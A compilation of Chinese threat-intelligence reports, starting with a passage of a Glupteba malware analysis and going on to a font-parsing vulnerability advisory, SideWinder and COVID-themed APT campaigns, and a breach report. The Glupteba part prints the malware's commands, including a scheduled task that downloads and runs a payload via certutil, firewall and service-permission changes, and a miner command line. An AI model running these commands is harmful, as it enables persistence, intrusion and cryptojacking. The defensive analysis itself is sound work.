在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件,并加载对应的驱动程序: Winmon.sys用于隐藏对应PID进程; WinmonFS.sys隐藏指定文件或目录; WinmonProcessMonitor.sys查找指定进程,并关闭。 维护以系统服务的方式启动的木马(检查服务、下载安装服务、更新服务、删除服务)。 下载永恒之蓝漏洞漏洞利用程序,利用漏洞攻击局域网机器。 下载矿机和挖矿代理配置信息。 获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash。 在handleCommand函数中实现后门功能,包括下载文件、程序执行等。 各函数及对应操作如下: 函数 操作 GetAppName 获取App名 IsAdmin 是否Admin账号 ProcessIsRunning 进程是否运行 Update 更新 Exec 执行程序 Download 下载 DownloadAndRun 下载并执行 DownloadAndRunExtended 下载并执行扩展 Exit 退出 UpdateData 更新数据 UpdateCloudnet 更新cloudnet.exe StopWUP 停止挖矿程序wup.exe UpdateService 更新服务 GetLogfileProxy 读取日志文件\proxy\t GetLogfileI2Pd 读取日志文件\i2pd\i2pd.log Notify 开启心跳包,在指定的时间间隔进行上报 NotifyHost 上报主机 EventExists 判断event是否存在 MutexExists 判断Mutuex是否存在 RegistryGetStartup 注册自启动项 VerifySignature 验证文件签名 RegistryGetStartupSignatures 验证启动项文件签名 VerifyProcessesSignatures 验证进程文件签名 GetUnverifiedFiles 上报未签名的文件 GetStatsWUP 获取挖矿木马统计信息 UploadFile 上传文件 Install 下载并安装 SC 截屏 UpdateCDN 更新C2 DiscoverElectrum 使用硬编码的以太币钱包,读取区块链交易数据 DiscoverBlockchaincom 从区块链交易数据中获取加密的新的C2地址 设置防火墙规则,将csrss.exe添加到白名单: `netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:\Windows\rss\csrss.exe” enable=yes` 写入windows defender规则,添Winmon、WinmonFS、WinmonProcessMonitor加到白名单: cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)   安装名为“ScheduledUpdate”的计划任务,任务内容为:每当用户登陆时,利用certutil.exe下载app.exe,保存为scheduled.exe并运行: `schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340” /TN ScheduledUpdate /F` 灵活更新C2: 通过公开的列表查询Electrum比特币钱包服务器,使用硬编码的hash值查询对应的区块链脚本hash记录,对返回的数据进行AES解密得到新的C2地址。 组件updateprofile.exe为密码提取器,也使用Go编写,并使用UPX壳保护。 运行后搜集包括Chrome,Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码,打包上传到远程服务器。 组件cloudnet.exe负责构建僵尸网络, 会读取注册表中存放的UUID进行校验,在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息,移动自身到“\cloudnet\”文件夹下,连接C2服务器,接收远控指令。 组件wup.exe负责挖矿门罗币,csrss.exe启动wup.exe时传递参数 `C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background` Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件,最后执行另一同名文件C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿,该文件由开源挖矿程序XMRig编译。   三、安全建议 企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。 也可检查以下各项,如有进行清除: 目录和文件: C:\Users\Administrator\AppData\LoCal\Temp\Csrss\smb\ C:\users\administrator\appdata\loCal\temp\Csrss\ C:\Windows\rss\Csrss.exe C:\Windows\windefender.exe C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\WinmonProCessMonitor.sys C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe 注册表: HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random> HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet HKEY_CURRENT_USER\Software\MiCrosoft\<random> HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost 计划任务: ScheduledUpdate IOCs Domain biggames.club biggames.online deepsound.live sndvoices.com 2makestorage.com infocarnames.ru URL http[:]//biggames.club/app/app.exe https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe md5 b1c081429c23e3ef0268fd33e2fe79f9 da75bc9d4d74a7ae4883bfa66aa8e99b 00201e5ad4e27ff63ea32fb9a9bb2c2e 6918fd63f9ec3126b25ce7f059b7726a fcf8643ff7ffe5e236aa957d108958c9 9b47b9f19455bf56138ddb81c93b6c0c 0dbecc91932301ccc685b9272c717d61 矿池: premiumprice.shop:50001 参考链接 https://www.freebuf.com/articles/system/172929.html https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/

微软发布字体解析远程代码执行漏洞补丁,建议用户尽快修补

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg 漏洞背景 3月23日,微软发布公告ADV200006称Adobe Type Manager Library中存在2个未修补的漏洞,当Windows Adobe Type Manager Library处理Adobe Type 1 PostScript 格式字体时存在两个远程执行代码漏洞。 4月15日,谷歌安全团队称已发现该漏洞的野外利用,微软在4月例行安全更新中,已修补CVE-2020-1020/CVE-2020-0938漏洞。 腾讯安全团队已对漏洞进行分析,该漏洞可稳定利用: 视频详见:https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg 漏洞版本 Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for ARM64-based Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Version 1803 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows 10 Version 1809 for ARM64-based Systems Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows 8.1 for 32-bit systems Windows 8.1 for x64-based systems Windows RT 8.1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1803 (Server Core Installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) 漏洞分析 漏洞模块为atmfd.sys(Windows 10 1703后是fontdrvhost.exe),成因在于Windows解析PostScript字体中的BlendDesignPositions或BlendVToHOrigin时,没有经过安全检查,导致处理模块可能引发越界写,栈溢出的问题。 SetBlendDesignPositions BlendDesignPositions格式如下: Win7 x86环境下,atmfd!SetBlendDesignPositions在解析BlendDesignPositions array时,会将内容全部保存到栈上,缓冲区的大小是960(0x3C0),因此最多存放16个sub-array,当sub-array数量大于16时,会引发溢出: ParseBlendVToHOrigin atmfd!ParseBlendVToHOrigin在处理数组BlendVToHOrigin时存在两处溢出。 Win7x86下由于定义的int v12[2]仅有8个字节,当NumMasters大于2时,引发缓冲区溢出: NumMasters大小可以在字体文件中通过构造特殊的BlendDesignPositions或WeightVector控制: 第二处溢出发生在atmfd.sys读取BlendVToHOrigin时,首先获取当前NumMasters并根据其大小将BlendVToHOrigin的数据复制到栈中的V11,由于NumMasters可控,当NumMasters过大时会对栈中的v11造成溢出,V11同样也是8字节: 第二次溢出时,由于V12在V11的高地址方向,所以当V11溢出时会覆写V12中保存的指针。 补丁分析 由于win7已停止更新,win10 1703后微软把atmfd.sys模块的功能移植到fontdrvhost.exe中,补丁前后漏洞模块共做了2处修改,2个函数均存在栈溢出漏洞: 补丁后SetBlendDesignPositions中增加了条件判断,sub-array数量超过16时返回错误,避免溢出: 补丁后ParseBlendVToHOrigin中启用了GS保护栈的完整性,并在读取BlendVToHOrigin数组前,限制了NumMasters大小; 解决方案 1. 推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客利用漏洞的攻击行为进行检测。腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 腾讯T-Sec高级威胁检测系统可检测利用Type 1字体漏洞的攻击行为 2.推荐企业用户使用腾讯T-Sec终端安全管理系统(御点)修补各终端系统的安全漏洞,个人用户可使用腾讯电脑管家的漏洞修补功能安装补丁,也可使用Windows Update。 时间线 3月23日,微软发布通告ADV200006称Adobe Type Manager Library中存在2个未修补的漏洞; 3月24日,腾讯安全发布漏洞通告; 4月15日,微软官方发布CVE-2020-1020/CVE-2020-0938漏洞通告及补丁。 参考链接: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938

响尾蛇(SideWinder)APT组织使用新冠疫情为诱饵的攻击活动分析

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/yxUTG3Qva169-XiYV0pAyQ   一、背景介绍 伴随新冠疫情在全球范围的爆发,疫情的动态资讯成为我们每天必会定接触到的外界信息,在这种大环境下,我们对疫情主题相关的推送信息警惕性会相对变低。而善于浑水摸鱼,披狼皮装羊的APT组织自然不会放过这种增热点的机会,以“新冠疫情”为主题的APT攻击活动从2月份起就持续不断。 最近,腾讯安全威胁情报中心就捕获到了一起响尾蛇(SideWinder)APT组织以新冠疫情为主题针对巴基斯坦军方的攻击活动。 响尾蛇(SideWinder)是腾讯安全威胁情报中心最早在2018年披露的APT攻击组织,该组织最早的攻击活动可以追溯到 2012 年。该组织主要针对巴基斯坦、中国大陆的政府、军工、军事目标等进行攻击活动。攻击武器库包括PC端、移动端等。 二、技术分析 本次攻击的诱饵为一个名为Pak_Army_Deployed_in_Country_in_Fight_Against_Coronavirus.pdf.lnk的快捷方式文件: 该lnk文件的基本属性 诱饵的生成时间和其他属性 可以看到攻击者的诱饵生成时间为2019年的6月19日,在vmware虚拟机生成。 执行快捷方式后,会从http://www.d01fa.net/images/D817583E/16364/11542/f2976745/966029e下载hta文件并且执行。 下载回来的hta会对受害设备上的.NET进行版本检测,删除除了V2和V4以外的版本,还通过shell指令指定执行的版本,此外,样本之后释放的的rekeywiz.exe.config配置文件目的与之相同,均为防止不同.NET版本之前出现兼容性问题。 除了对受害设备.NET版本进行版本选择之外,HTA文件还会对设备上的杀软进行检测: 之后,会创建一个HTA实例,通过url下载第二个HTA文件并将之执行,同时释放命名为“Pak_Army_Deployed_in_Country_in_Fight_Against_Coronavirus.pdf”的PDF诱饵文档: 释放的诱饵文档为: 可以看到,诱饵内容跟新冠疫情、巴基斯坦军方相关。 第二个HTA文件其数据解密方式,以及总体框架与第一个HTA文件相同,主要功能是在C:\ProgramData\创建了一个fontFiles文件夹(包含释放的四个文件:Duser.dll、rekeywiz.exe、rekeywiz.exe.config、SOHYXY.tmp),利用rekeywiz.exe白文件加载Duser.dll黑文件。该白加黑的手法也是SideWinder惯用伎俩。其中TMP文件的文件名为随机字符: Duser.dll为一个加载器,主要目的是对之前释放的SOHYXY.tmp文件进行简单的异或解密,然后进行加载: 解密后的SystemApp.dll文件,是为最终释放的RAT。 该RAT的功能跟之前的类似,包括信息收集、文件上传等。 如对用户信息、设备信息、网卡信息、已安装杀软的信息、磁盘驱动设备信息、设备已安装进程信息等进行窃取、收集: 文件上传途径有两种,对应RAT在配置模块中的两个等待上传的文件列表,C2通过下发指令修改配置模块,实现对所有文件或指定文件的上传。文件上传: 对C2的下发指令进行分析,可得出以下指令集: RAT会在fontFiles文件夹中新建名为“font”的文件,用于保存C2下发的指令,但指令是经过加密的,经过解密之后,可查看指令明文,而每一次指令下发,原指令数据都会被覆盖,生成新的font文件。 三、关联分析 除了发现的以“新冠疫情”为主题的样本以外,我们还发现了SideWinder(响尾蛇)的多个其他攻击活动。 如Additional_CSD_Rebate.pdf.lnk,以向退役军人发放csd回扣卡为主题的进行钓鱼活动: 诱饵文件除了lnk之外,还有使用office漏洞的攻击,如 但是最终执行的payload都大同小异,就不再赘述。 四、安全建议 1、建议重要机构网管培训工作人员不要随意打开不明来源的邮件附件,在邮件目的及发件人均未知的情况下,建议不要访问附件。 2、建议企业用户使用腾讯T-Sec终端安全管理系统(御点)修补漏洞,及时安装系统补丁,可减少被漏洞攻击的风险,同时注意打开Office文档时,避免启用宏代码。 3、推荐企业用户部署腾讯T-Sec高级威胁检测系统(御界)对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 五、附录 1、IOCs 3c9f64763a24278a6f941e8807725369 40fd59323c3883717faca9424b29b9aa 3e0c08851aafbca17dda7ce54ba52cb9 1aa880affbd363401e1a25c07ad1ef1e 95413052d03971654687d8508a6a32e9 7a4f9c2e5a60ec498c66d85d2df351e8 120e3733e167fcabdfd8194b3c49560b 7442b3efecb909cfff4aea4ecaae98d8 bfad291d000b56ddd8a331d7283685b2 fef12d62a3b2fbf1d3be1f0c71ae393e 58363311f04f03c6e9ccd17b780d03b2 9b1d0537d0734f1ddb53c5567f5d7ab5 URL https://cloud-apt.net/202/AEETLbHd0DGh9r86lU6CFOCttbakx5vMmEGfKLTP/16364/11542/9c8ea254 https://www.d01fa.net /202/AEETLbHd0DGh9r86lU6CFOCttbakx5vMmEGfKLTP/16364/11542/9c8ea254 http://www.d01fa.net/plugins/16364/11542/true/true/ http://cloud-apt.net /plugins/16364/11542/true/true/ http://www.d01fa.net/cgi/8ee4d36866/16364/11542/58a3a04b/file.hta http://cloud-apt.net /cgi/8ee4d36866/16364/11542/58a3a04b/file.hta http://www.d01fa.net/images/D817583E/16364/11542/f2976745/966029e http://www.fdn-en.net/images/0B0D90AD/-1/2418/9ccd0068/9d68236 http://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e http://ap-ms.net/202/M2qIMRE6Wu5W0pgsgYpzoKzlzclgtHbcLzhudKaF/-1/12571/d2d06434 https://www.sd1-bin.net/images/2B717E98/-1/12571/4C7947EC/main.file.rtf https://reawk.net/202/jQcPZ3kx6hGod25WMnTocKStUToZEPRy6WfWkEX3/-1/12571/87854fea 2、参考链接 https://s.tencent.com/research/report/799.html https://s.tencent.com/research/report/659.html https://mp.weixin.qq.com/s/CZrdslzEs4iwlaTzJH7Ubg  

意大利电子邮件服务商被黑 60 万用户数据在暗网出售

ZDNet从一位读者提供的消息当中得知,目前有超过60万Email.it用户的数据正在暗网上被出售。这家意大利的电子邮件服务提供商周一向ZDNet表示:“不幸的是,我们必须确认,我们遭遇了黑客的攻击。” Email.it黑客攻击在周日曝光,当时黑客们在Twitter上宣传了一个暗网网站,在该网站上出售公司的数据。黑客声称实际入侵发生在两年多前,即2018年1月,黑客入侵了Email.it数据中心,从服务器上拿走了任何可能的敏感数据,并选择给这家意大利的电子邮件服务提供商一个机会修补漏洞,同时要求们给黑客一点赏金,但是这家意大利的电子邮件服务提供商拒绝与黑客谈判,并继续欺骗它的用户。 另外,黑客们在2月1日试图勒索Email.it,当时他们要求对方支付赏金。Email.it的一位发言人周一告诉ZDNet,该公司拒绝支付,转而通知了意大利邮政警察局(CNAIPIC)。在勒索失败后,黑客们现在正在以0.5到3个比特币(3500到22000美元)不等的要价出售该公司的数据。这些数据库包含了注册了免费Email.it电子邮件账户的用户信息。 黑客声称,这些数据库包含了2007年至2020年期间注册并使用该服务60多万用户的明文密码、安全问题、电子邮件内容和电子邮件附件。   (稿源:cnBeta,封面源自网络。)

近期使用”新冠疫情(COVID-19)”为诱饵的 APT 攻击活动汇总

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/UXbsJsCbz6FsQ-ztbk6CaQ   一、概述 目前,由新型冠状病毒引起的肺炎疫情(COVID-19)在全球蔓延,已有190个国家存在确诊病例,全球确诊人数已经超过43万人,死亡病例超过1.9万。中国大陆已基本控制住疫情,但在意大利、西班牙、美国等发达国家疫情仍处于爆发期,世界卫生组织已将疫情的全球风险级别确定为“非常高”。 而随着新冠病毒疫情(COVID-19)在全球蔓延,以此为主题的网络攻击事件骤然增长。其中中国大陆、意大利、韩国等国家成为黑客网络攻击的高风险地区。腾讯安全威胁情报中心自疫情爆发后,已检测到多起以新冠病毒疫情为主题的攻击活动。 攻击者大多以投递邮件的方式,构造诱饵文件欺骗用户点击,恶意文件类型多种多样,覆盖EXE、MS Office宏文档、漏洞文档、lnk文件、VBS脚本等。而攻击的背景也包括具有国家背景的专业APT组织和普通黑产组织。 本文对近期发现的以新冠病毒疫情为诱饵的攻击活动加以汇总,供大家参考。在此提醒广大政企单位和个人用户,在做好疫情防控的同时,也要做好网络安全的防护工作。 二、近期活跃的APT攻击及黑产 01 具有国家背景的APT攻击活动 1)海莲花(APT32)组织 海莲花,又称APT32、OceanLotus,被认为是具有越南国家背景的攻击组织。该组织自发现以来,一直针对中国的政府部门、国企等目标进行攻击活动,为近年来对中国大陆进行网络攻击活动最频繁的APT组织。腾讯安全威胁情报中心在2019年也多次曝光了该组织的攻击活动。 自新冠疫情爆发以来,该组织正变本加厉对中国大陆相关目标进行网络攻击活动。攻击方式依然采用鱼叉邮件攻击,钓鱼邮件同样使用跟新冠病毒疫情相关的诱饵文档。如: 攻击诱饵包括lnk文件、白加黑攻击方式等: 技术细节跟之前曝光的变化不大,本文不再过多描述。 除了投递恶意木马外,海莲花还是用无附件攻击,用来探查用户的一些信息: 也有附件和探针一起的: 2)蔓灵花(BITTER)组织 蔓灵花也是对中国大陆进行攻击的比较频繁的一个攻击组织,其目标包括外交部门,军工、核能等重点企业。 在疫情爆发后,该组织同样采用了跟疫情相关的诱饵来对一些目标进行攻击: 最终释放的特种木马为2019年才开始采用的C#木马: 3)Kimsuky组织 Kimsuky组织被认为是来自东亚某国的攻击组织,该组织一直针对韩国政府部门、大学教授等目标进行攻击活动。Kimsuky组织为韩国安全厂商命名,腾讯安全威胁情报中心在2018、2019均披露过的Hermit(隐士)同属该攻击组织。 在2020年2月底到3月初期,韩国是除中国大陆外受疫情影响最严重的国家。于是Kimsuky十分活跃,开始利用疫情相关的诱饵,对韩国目标进行攻击活动。同时我们发现,该组织还同时具备多平台的攻击能力。 此外,该组织还针对MacOS进行攻击: 最终的恶意文件使用python编写,用来收集用户信息,和C&C进行通信来获取命令等: 4)TransprentTribe组织 TransparentTribe APT组织,又称ProjectM、C-Major,是一个来自巴基斯坦的APT攻击组织,主要目标是针对印度政府、军事目标等。腾讯安全威胁情报在2019年也多次曝光该组织的一些攻击活动。 虽然新冠病毒疫情暂时还未在印度爆发,但是印度也已经在进行一些疫情相关的防控举措,包括关闭国门,加强检疫等等。但是网络攻击不会因此而停止,攻击者同样借助疫情相关资讯进行攻击活动。如: 执行后的宏代码为: 执行后的宏代码为: 02 其他网络黑产活动 包括白象、毒云藤、gamaredon等攻击组织均使用新冠疫情相关诱饵对特定目标进行攻击。由于已经有大量报告针对该些活动的分析,本文就不再罗列。 1)网络诈骗 网络诈骗也是网络攻击活动中的一种,在疫情爆发之后,腾讯安全威胁情报中心检测到多次使用疫情有关的内容进行恶意诈骗的案例。如: 在该案例中,借口让人捐款来研发疫苗,诱使收件人进行比特币转账。所幸,该诈骗活动并未有人上当: 2)投递窃密木马 群发垃圾邮件投递窃密木马也是近期黑产惯用的一些手法,如下: Hancitor木马 假冒保险发票信息 TA505 假冒COVID-19 FAQ的诱饵文档,欺骗目标用户启用宏代码。 商贸信 假冒世卫组织发送诈骗邮件投递商业木马。 商贸信 假冒世卫组织发送诈骗邮件投递商业木马。 最终释放的窃密木马功能包括cookie窃取、键盘记录、上传下载文件等。 4)勒索病毒 近期检测到勒索病毒主要为两种: 一种为使用新冠疫情为诱饵传播勒索病毒,如CORONAVIRUS_COVID-19.vbs ,最终释放Netwalker勒索病毒 另外一种勒索病毒直接将自己命名为新冠病毒: 三、总结和建议 从本文罗列的以新冠疫情(COVID-19)有关的攻击活动可以看到,网络攻击会紧跟社会热点,精心构造跟时事、热点有关的资讯作攻击诱饵,诱使目标用户点击再植入恶意文件或者进行网络诈骗活动。 在全球新冠疫情全球大爆发的时候,利用新冠疫情相关诱饵进行的网络攻击,其中有些攻击对象还包括医疗机构,手段可谓卑劣至极!因此我们提醒政企机关单位和个人,务必提高警惕,勿轻易信任何与疫情有关的资讯邮件,勿轻易启用Office的宏代码查看文档。 我们建议政企机构使用腾讯安全推荐的方案进行防御,个人用户推荐使用腾讯电脑管家,保持实时防护功能为开启状态。 腾讯安全解决方案部署示意图 IOCs MD5 f6fe2b2ce809c317c6b01dfbde4a16c7 0e5f284a3cad8da4e4a0c3ae8c9faa9d aa5c9ab5a35ec7337cab41b202267ab5 d739f10933c11bd6bd9677f91893986c d9ce6de8b282b105145a13fbcea24d87 a9dac36efd7c99dc5ef8e1bf24c2d747 a4388c4d0588cd3d8a607594347663e0 1b6d8837c21093e4b1c92d5d98a40ed4 31f654dfaa11732a10e774085466c2f6 0573214d694922449342c48810dabb5a 501b86caaa8399d508a30cdb07c78453 e96d9367ea326fdf6e6e65a5256e3e54 da44fd9c13eb1e856b54e0c4fdb44cc7 e074c234858d890502c7bb6905f0716e e262407a5502fa5607ad3b709a73a2e0 ce15cae61c8da275dba979e407802dad b7790bf4bcb84ddb08515f3a78136c84 379f25610116f44c8baa7cb9491a510d 7a1288c7be386c99fad964dbd068964f 258ed03a6e4d9012f8102c635a5e3dcd f272b1b21a74f74d5455dd792baa87e1 域名 m.topiccore.com libjs.inquirerjs.com vitlescaux.com vnext.mireene.com crphone.mireene.com new.915yzt.cn primecaviar.com bralibuda.com dysoool.com m0bile.net fuly-lucky.com IP 63.250.38.240 107.175.64.209